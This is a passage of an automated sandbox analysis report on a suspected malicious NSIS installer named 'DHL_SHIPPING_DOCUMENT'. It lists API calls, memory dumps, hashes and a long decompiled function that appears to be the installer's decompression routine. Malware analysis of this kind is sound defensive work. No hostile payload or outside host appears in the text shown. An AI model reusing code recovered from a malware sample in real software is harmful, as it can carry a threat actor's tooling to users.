				return 0;
			}









                                                              0x0040604b
                                                              0x00406056
                                                              0x0040605a
                                                              0x00406061
                                                              0x0040606d
                                                              0x0040607d
                                                              0x0040607f
                                                              0x00406097
                                                              0x00406098
                                                              0x0040609f
                                                              0x004060a0
                                                              0x00000000
                                                              0x00000000
                                                              0x00406083
                                                              0x0040608a
                                                              0x00406092
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x0040608a
                                                              0x004060a2
                                                              0x004060a8
                                                              0x00000000
                                                              0x004060b6
                                                              0x0040606f
                                                              0x00406075
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00406075
                                                              0x0040605c
                                                              0x00000000

                                                              APIs
                                                                • Part of subcall function 00406668: lstrcpynW.KERNEL32(?,?,00000400,004037B0,00429260,NSIS Error), ref: 00406675
                                                                • Part of subcall function 00405FE2: CharNextW.USER32(?,?,00425F50,?,00406056,00425F50,00425F50,7476FAA0,?,7476F560,00405D94,?,7476FAA0,7476F560,00000000), ref: 00405FF0
                                                                • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 00405FF5
                                                                • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 0040600D
                                                              • lstrlenW.KERNEL32(00425F50,00000000,00425F50,00425F50,7476FAA0,?,7476F560,00405D94,?,7476FAA0,7476F560,00000000), ref: 00406098
                                                              • GetFileAttributesW.KERNELBASE(00425F50,00425F50,00425F50,00425F50,00425F50,00425F50,00000000,00425F50,00425F50,7476FAA0,?,7476F560,00405D94,?,7476FAA0,7476F560), ref: 004060A8
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.325407828.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.325399231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325416433.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000047D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_DHL_SHIPPING_DOCUMENT.jbxd
                                                              Similarity
                                                              • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                              • String ID: P_B
                                                              • API String ID: 3248276644-906794629
                                                              • Opcode ID: 900e3a3aedd828ccf636743a116f58552bc6887dcb5d3e9637a901da882d1290
                                                              • Instruction ID: df110f430b83b9381375b5fd3fa67f6c4419d4890c6468873e0fced3c2676832
                                                              • Opcode Fuzzy Hash: 900e3a3aedd828ccf636743a116f58552bc6887dcb5d3e9637a901da882d1290
                                                              • Instruction Fuzzy Hash: 0DF07826144A1216E622B23A0C05BAF05098F82354B07063FFC93B22E1DF3C8973C43E
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00407194 Relevance: 5.2, APIs: 4, Instructions: 236COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 696 407194-40719a 697 40719c-40719e 696->697 698 40719f-4071bd 696->698 697->698 699 407490-40749d 698->699 700 4073cb-4073e0 698->700 703 4074c7-4074cb 699->703 701 4073e2-4073f8 700->701 702 4073fa-407410 700->702 704 407413-40741a 701->704 702->704 705 40752b-40753e 703->705 706 4074cd-4074ee 703->706 707 407441 704->707 708 40741c-407420 704->708 711 407447-40744d 705->711 709 4074f0-407505 706->709 710 407507-40751a 706->710 707->711 712 407426-40743e 708->712 713 4075cf-4075d9 708->713 714 40751d-407524 709->714 710->714 716 406bf2 711->716 717 4075fa 711->717 712->707 718 4075e5-4075f8 713->718 719 4074c4 714->719 720 407526 714->720 721 406bf9-406bfd 716->721 722 406d39-406d5a 716->722 723 406c9e-406ca2 716->723 724 406d0e-406d12 716->724 726 4075fd-407601 717->726 718->726 719->703 727 4074a9-4074c1 720->727 728 4075db 720->728 721->718 729 406c03-406c10 721->729 722->700 732 406ca8-406cc1 723->732 733 40754e-407558 723->733 730 406d18-406d2c 724->730 731 40755d-407567 724->731 727->719 728->718 729->717 734 406c16-406c5c 729->734 735 406d2f-406d37 730->735 731->718 736 406cc4-406cc8 732->736 733->718 737 406c84-406c86 734->737 738 406c5e-406c62 734->738 735->722 735->724 736->723 739 406cca-406cd0 736->739 744 406c94-406c9c 737->744 745 406c88-406c92 737->745 742 406c64-406c67 GlobalFree 738->742 743 406c6d-406c7b GlobalAlloc 738->743 740 406cd2-406cd9 739->740 741 406cfa-406d0c 739->741 746 406ce4-406cf4 GlobalAlloc 740->746 747 406cdb-406cde GlobalFree 740->747 741->735 742->743 743->717 748 406c81 743->748 744->736 745->744 745->745 746->717 746->741 747->746 748->737
                                                              C-Code - Quality: 99%
                                                              			E00407194() {
				signed int _t530;
				void _t537;
				signed int _t538;
				signed int _t539;
				unsigned short _t569;
				signed int _t579;
				signed int _t607;
				void* _t627;
				signed int _t628;
				signed int _t635;
				signed int* _t643;
				void* _t644;

				L0:
				while(1) {
					L0:
					_t530 =  *(_t644 - 0x30);
					if(_t530 >= 4) {
					}
					 *(_t644 - 0x40) = 6;
					 *(_t644 - 0x7c) = 0x19;
					 *((intOrPtr*)(_t644 - 0x58)) = (_t530 << 7) +  *(_t644 - 4) + 0x360;
					while(1) {
						L145:
						 *(_t644 - 0x50) = 1;
						 *(_t644 - 0x48) =  *(_t644 - 0x40);
						while(1) {
							L149:
							if( *(_t644 - 0x48) <= 0) {
								goto L155;
							}
							L150:
							_t627 =  *(_t644 - 0x50) +  *(_t644 - 0x50);
							_t643 = _t627 +  *((intOrPtr*)(_t644 - 0x58));
							 *(_t644 - 0x54) = _t643;
							_t569 =  *_t643;
							_t635 = _t569 & 0x0000ffff;
							_t607 = ( *(_t644 - 0x10) >> 0xb) * _t635;
							if( *(_t644 - 0xc) >= _t607) {
								 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t607;
								 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t607;
								_t628 = _t627 + 1;
								 *_t643 = _t569 - (_t569 >> 5);
								 *(_t644 - 0x50) = _t628;
							} else {
								 *(_t644 - 0x10) = _t607;
								 *(_t644 - 0x50) =  *(_t644 - 0x50) << 1;
								 *_t643 = (0x800 - _t635 >> 5) + _t569;
							}
							if( *(_t644 - 0x10) >= 0x1000000) {
								L148:
								_t487 = _t644 - 0x48;
								 *_t487 =  *(_t644 - 0x48) - 1;
								L149:
								if( *(_t644 - 0x48) <= 0) {
									goto L155;
								}
								goto L150;
							} else {
								L154:
								L146:
								if( *(_t644 - 0x6c) == 0) {
									L169:
									 *(_t644 - 0x88) = 0x18;
									L170:
									_t579 = 0x22;
									memcpy( *(_t644 - 0x90), _t644 - 0x88, _t579 << 2);
									_t539 = 0;
									L172:
									return _t539;
								}
								L147:
								 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
								 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
								_t484 = _t644 - 0x70;
								 *_t484 =  &(( *(_t644 - 0x70))[1]);
								 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
								goto L148;
							}
							L155:
							_t537 =  *(_t644 - 0x7c);
							 *((intOrPtr*)(_t644 - 0x44)) =  *(_t644 - 0x50) - (1 <<  *(_t644 - 0x40));
							while(1) {
								L140:
								 *(_t644 - 0x88) = _t537;
								while(1) {
									L1:
									_t538 =  *(_t644 - 0x88);
									if(_t538 > 0x1c) {
										break;
									}
									L2:
									switch( *((intOrPtr*)(_t538 * 4 +  &M00407602))) {
										case 0:
											L3:
											if( *(_t644 - 0x6c) == 0) {
												goto L170;
											}
											L4:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t538 =  *( *(_t644 - 0x70));
											if(_t538 > 0xe1) {
												goto L171;
											}
											L5:
											_t542 = _t538 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t581);
											_push(9);
											_pop(_t582);
											_t638 = _t542 / _t581;
											_t544 = _t542 % _t581 & 0x000000ff;
											asm("cdq");
											_t633 = _t544 % _t582 & 0x000000ff;
											 *(_t644 - 0x3c) = _t633;
											 *(_t644 - 0x1c) = (1 << _t638) - 1;
											 *((intOrPtr*)(_t644 - 0x18)) = (1 << _t544 / _t582) - 1;
											_t641 = (0x300 << _t633 + _t638) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t644 - 0x78))) {
												L10:
												if(_t641 == 0) {
													L12:
													 *(_t644 - 0x48) =  *(_t644 - 0x48) & 0x00000000;
													 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t641 = _t641 - 1;
													 *((short*)( *(_t644 - 4) + _t641 * 2)) = 0x400;
												} while (_t641 != 0);
												goto L12;
											}
											L6:
											if( *(_t644 - 4) != 0) {
												GlobalFree( *(_t644 - 4));
											}
											_t538 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t644 - 4) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t644 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L157:
												 *(_t644 - 0x88) = 1;
												goto L170;
											}
											L14:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x40) =  *(_t644 - 0x40) | ( *( *(_t644 - 0x70)) & 0x000000ff) <<  *(_t644 - 0x48) << 0x00000003;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t45 = _t644 - 0x48;
											 *_t45 =  *(_t644 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t644 - 0x48) < 4) {
												goto L13;
											}
											L16:
											_t550 =  *(_t644 - 0x40);
											if(_t550 ==  *(_t644 - 0x74)) {
												L20:
												 *(_t644 - 0x48) = 5;
												 *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) =  *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											L17:
											 *(_t644 - 0x74) = _t550;
											if( *(_t644 - 8) != 0) {
												GlobalFree( *(_t644 - 8));
											}
											_t538 = GlobalAlloc(0x40,  *(_t644 - 0x40)); // executed
											 *(_t644 - 8) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t557 =  *(_t644 - 0x60) &  *(_t644 - 0x1c);
											 *(_t644 - 0x84) = 6;
											 *(_t644 - 0x4c) = _t557;
											_t642 =  *(_t644 - 4) + (( *(_t644 - 0x38) << 4) + _t557) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L158:
												 *(_t644 - 0x88) = 3;
												goto L170;
											}
											L22:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											_t67 = _t644 - 0x70;
											 *_t67 =  &(( *(_t644 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L23:
											 *(_t644 - 0x48) =  *(_t644 - 0x48) - 1;
											if( *(_t644 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t559 =  *_t642;
											_t626 = _t559 & 0x0000ffff;
											_t596 = ( *(_t644 - 0x10) >> 0xb) * _t626;
											if( *(_t644 - 0xc) >= _t596) {
												 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t596;
												 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t596;
												 *(_t644 - 0x40) = 1;
												_t560 = _t559 - (_t559 >> 5);
												__eflags = _t560;
												 *_t642 = _t560;
											} else {
												 *(_t644 - 0x10) = _t596;
												 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
												 *_t642 = (0x800 - _t626 >> 5) + _t559;
											}
											if( *(_t644 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t644 - 0x6c) == 0) {
												L168:
												 *(_t644 - 0x88) = 5;
												goto L170;
											}
											L138:
											 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L139:
											_t537 =  *(_t644 - 0x84);
											L140:
											 *(_t644 - 0x88) = _t537;
											goto L1;
										case 6:
											L25:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L36:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L26:
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												L35:
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												L32:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											L66:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												L68:
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											L67:
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											L70:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											L73:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											L74:
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											L75:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											L82:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L84:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L83:
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											L85:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L164:
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											L100:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L159:
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											L38:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											L40:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												L45:
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L160:
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											L47:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												L49:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													L53:
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L161:
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											L59:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												L65:
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L165:
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											L110:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											goto L132;
										case 0x12:
											L128:
											__eflags =  *(__ebp - 0x40);
